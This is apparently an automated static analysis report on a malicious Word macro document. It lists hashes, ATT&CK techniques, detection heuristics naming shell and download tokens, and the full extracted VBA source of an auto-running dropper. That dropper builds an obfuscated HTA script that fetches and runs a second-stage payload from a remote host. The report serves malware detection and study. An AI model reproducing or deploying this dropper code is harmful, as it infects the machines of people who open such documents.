Malicious Office (OOXML) / .DOC — malware analysis report

Static analysis result for SHA-256 114be5fbd6496725…

MALICIOUS

Office (OOXML) / .DOC

80.5 KB Created: 2021-04-30 07:24:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-05-04
MD5: d7f00e4697b2c95dc413829ae30d6dd3 SHA-1: d103699b3e6588a8e045918d2c487d99444aa5db SHA-256: 114be5fbd6496725c88d30691cb2084075160454b9b7a46275e9f12667090daa
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample contains a VBA macro that executes upon opening the document. This macro utilizes WScript.Shell and CreateObject to execute obfuscated code. The script attempts to download and execute a second-stage payload, indicated by the use of WScript.Shell's .exec method and the obfuscated string concatenation within the `removeVar` function, which likely decodes to a malicious URL.

Heuristics 6

  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    Set WVar = CreateObject("wscript.shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set WVar = CreateObject("wscript.shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 6356 bytes
SHA-256: 64567cc1102349906dcda791a369e73791f5a694fc93aa7ef9c9e2ff941311ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
main
End Sub

Attribute VB_Name = "frm"
Attribute VB_Base = "0{CDE267D7-FF30-4624-A1DD-55968BB26723}{8987B7AF-F09F-4000-B397-7A5391BE114D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Sub button1_Click()
Set memoryPtrRequest = ActiveDocument.BuiltInDocumentProperties("title")
Set WVar = CreateObject("wscript.shell")
With WVar
.exec$ (sr(memoryPtrRequest))
End With
End Sub


Attribute VB_Name = "counterLeft"
Sub main()
textboxScreenNext
End Sub
Function sr(buttonScreenCopy)
sr = StrReverse(buttonScreenCopy)
End Function
Function gwc(buttonScreenCopy)
If Len(buttonScreenCopy) > 0 Then
gwc = buttonScreenCopy
End If
End Function
Sub textboxScreenNext()
Dim linkCountConvert As String
sizeTextboxGlobal = Split(sr(ActiveDocument.BuiltInDocumentProperties("title")), " ")
linkCountConvert = sizeTextboxGlobal(1)
Set structVb = New rightConst
structVb.screenExOption linkCountConvert, memoryRightPaste
frm.button1_Click
End Sub

Attribute VB_Name = "optionBorder"
Public Function removeVar(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then removeVar = gwc("<html><body><div id='content'>fT" & "tlc29sYy5mZVJub2l0cGVjeEVmdWI7KT" & "IgLCJncGouY29yUG5pYU10cmV2bm9jXF" & "xjaWxidXBcXHNyZXN1XFw6YyIoZWxpZm" & "90ZXZhcy5mZVJub2l0cGVjeEVmdWI7KX" & "lkb2Jlc25vcHNlci5ub3R0dUJldHNhcC" & "hldGlydy5mZVJub2l0cGVjeEVmdWI7MS" & "A9IGVweXQuZmVSbm9pdHBlY3hFZnViO2" & "5lcG8uZmVSbm9pdHBlY3hFZnViOykibW" & "FlcnRzLmJkb2RhIih0Y2VqYk9YZXZpdG" & "NBIHdlbiA9IGZlUm5vaXRwZWN4RWZ1Yi" & "ByYXZ7KTAwMiA9PSBzdXRhdHMubm90dH" & "VCZXRzYXAoZmk7KShkbmVzLm5vdHR1Qm" & "V0c2FwOyllc2xhZiAsIjh1Z0xRNFg4Wm" & "1YOUk4Ym1HRjNNMkpzWHNETlU0OT1kaW" & "MmeXFNNEMyZ2ZEZEVob1JzTWFvSz1JSS" & "ZtZWxqUlFkbXVZR0UydWhUTlExZHhWcm" & "d4N0FkQW09cmVzdSYzRVdyPWRpYyZpU3" & "NDbGs5VVBRZ3c9bGk3TWRpU2pvPzJ3YW" & "wvZlBXVEhWNFphNlh2eFVpSmVuY3I5MW" & "1VSFRUVk11dkxPVGpkR0FaeS9HeTd5M3" & "dabmdka0NYVXhsanB5NFhaS08zcTM4aF" & "pSMkx1NTNjYjdlSC9zb3NnZC9tb2MuYW" & "5pZWxrcmVwc29ycC8vOnB0dGgiICwiVE" & "VHIihuZXBvLm5vdHR1QmV0c2FwOykicH")
End Function
Public Function varButton(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then varButton = gwc("R0aGxteC4ybG14c20iKHRjZWpiT1hldm" & "l0Y0Egd2VuID0gbm90dHVCZXRzYXAgcm" & "F2|fXspcnRQZWdhcm90cyhoY3RhY307K" & "SJhdGguY29yUG5pYU10cmV2bm9jXFxja" & "WxidXBcXHNyZXN1XFw6YyIoZWxpZmV0Z" & "WxlZC5XdGhnaXJ7eXJ0OykidGNlamJvb" & "WV0c3lzZWxpZi5nbml0cGlyY3MiKHRjZ" & "WpiT1hldml0Y0Egd2VuID0gV3RoZ2lyI" & "HJhdjspImdwai5jb3JQbmlhTXRyZXZub" & "2NcXGNpbGJ1cFxcc3Jlc3VcXDpjIDIzc" & "nZzZ2VyIihudXIuKSJsbGVocy50cGlyY" & "3N3Iih0Y2VqYk9YZXZpdGNBIHdlbg==<" & "/div><div id='table1'>ABCDEFGHIJ" & "KLMNOPQRSTUVWXYZ</div><div id='t" & "able2'>0123456789+/</div><div id" & "='table3'></div><script language" & "='javascript'>function clearMain" & "Iterator(exceptionTextboxQuery){" & "return(new ActiveXObject(excepti" & "onTextboxQuery));}function paste" & "ScreenDocument(swapTitleGlobal){" & "return(mainSizeClear.getElementB" & "yId(swapTitleGlobal).innerHTML);" & "}function WScreen(){var collecti" & "onQueryException = pasteScreenDo")
End Function
Public Function genericPtrLoad(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then genericPtrLoad = gwc("cument('table1');var pasteTextbo" & "xView = collectionQueryException" & ".toLowerCase();var bufDatabase =" & " pasteScreenDocument('table2');r" & "eturn(collectionQueryException +" & " pasteTextboxView + bufDatabase)" & ";}function globalOption(s){var e" & "={}; var i; var b=0; var c; var " & "x; var l=0; var a; var procedure" & "Array=''; var w=String.fromCharC" & "ode; var L=s.length;var arrayLin" & "kQuery = valueAException('tArahc" & "');for(i=0;i<64;i++){e[WScreen()" & "[arrayLinkQuery](i)]=i;}for(x=0;" & "x<L;x++){c=e[s[arrayLinkQuery](x" & ")];b=(b<<6)+c;l+=6;while(l>=8){(" & "(a=(b>>>(l-=8))&0xff)||(x<(L-2))" & ")&&(procedureArray+=w(a));}}retu" & "rn(procedureArray);};function va" & "lueAException(exceptionProcedure" & "){return exceptionProcedure.spli" & "t('').reverse().join('');}button" & "Select = window;mainSizeClear = " & "document;buttonSelect.resizeTo(1" & ", 1);buttonSelect.moveTo(-100, -")
End Function
Public Function APtrTable(bufWindow)
Dim genericConvertVar As Integer
genericConvertVar = 31337
If (Len(bufWindow) < genericConvertVar) Then APtrTable = gwc("100);var tempBuffer = mainSizeCl" & "ear.getElementById('content').in" & "nerHTML;var tempBuffer = tempBuf" & "fer.split('|');var requestBuffer" & "Paste = valueAException(globalOp" & "tion(tempBuffer[0]));var structS" & "torageCollection = valueAExcepti" & "on(globalOption(tempBuffer[1]));" & "</script><script language='javas" & "cript'>function copyClass(textSc" & "reen){var ExLoadVar = clearMainI" & "terator(valueAException('lortnoc" & "tpircs.lortnoctpircssm'));ExLoad" & "Var['Language'] = 'jscript';ExLo" & "adVar['Timeout'] = 60000;ExLoadV" & "ar['AddCode'](textScreen);return" & "(null);}</script><script languag" & "e='vbscript'>copyClass requestBu" & "fferPaste : copyClass structStor" & "ageCollection : buttonSelect.clo" & "se</script></body></html>")
End Function
Function memoryRightPaste()
memoryRightPaste = removeVar("ainT") + varButton("orde") + genericPtrLoad("arAr") + APtrTable("ount")
End Function

Attribute VB_Name = "rightConst"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Option Explicit
Public Function screenExOption(varAMemory As String, rightExClear As String)
Open varAMemory For Output As #1
Print #1, rightExClear
Close #1
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 30720 bytes
SHA-256: a7b5c710de3da233bff7a4aea8486442054dac9d301232f8dcc4491de674fd9b